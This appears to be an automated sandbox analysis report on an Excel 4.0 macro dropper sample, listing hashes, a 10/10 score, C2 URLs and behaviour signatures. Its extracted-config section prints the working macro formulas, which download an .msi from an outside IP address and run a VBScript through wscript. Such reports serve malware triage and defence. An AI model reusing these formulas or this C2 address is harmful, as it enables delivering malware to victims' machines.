General

  • Target

    d9278155a74e1a3555b5ed2533836628

  • Size

    6KB

  • Sample

    231222-sr6zpahbal

  • MD5

    d9278155a74e1a3555b5ed2533836628

  • SHA1

    5d2d1e3401fe9039e6f4ca98ac3fe95375d36abb

  • SHA256

    f8385d3418d0f52735943186cbab4f3fe2991673e1f55c0dc19324109cae08f7

  • SHA512

    d2694e8f5aae8297d7ded31c0e7b58b4e93c2b40f7bb640dd8c0af87d880ace141ad26bd9a0dafe3a1d8e2ccec4a12e484a828f0fa76ca0544cedb84ccf496c8

  • SSDEEP

    192:NDShuS/brA2OmmfR28UhHFBFYuQb98yyRN4unDAQ+xoUapuB:NmuwM2wA1FY9b98y4i

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      d9278155a74e1a3555b5ed2533836628

    • Size

      6KB

    • MD5

      d9278155a74e1a3555b5ed2533836628

    • SHA1

      5d2d1e3401fe9039e6f4ca98ac3fe95375d36abb

    • SHA256

      f8385d3418d0f52735943186cbab4f3fe2991673e1f55c0dc19324109cae08f7

    • SHA512

      d2694e8f5aae8297d7ded31c0e7b58b4e93c2b40f7bb640dd8c0af87d880ace141ad26bd9a0dafe3a1d8e2ccec4a12e484a828f0fa76ca0544cedb84ccf496c8

    • SSDEEP

      192:NDShuS/brA2OmmfR28UhHFBFYuQb98yyRN4unDAQ+xoUapuB:NmuwM2wA1FY9b98y4i

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks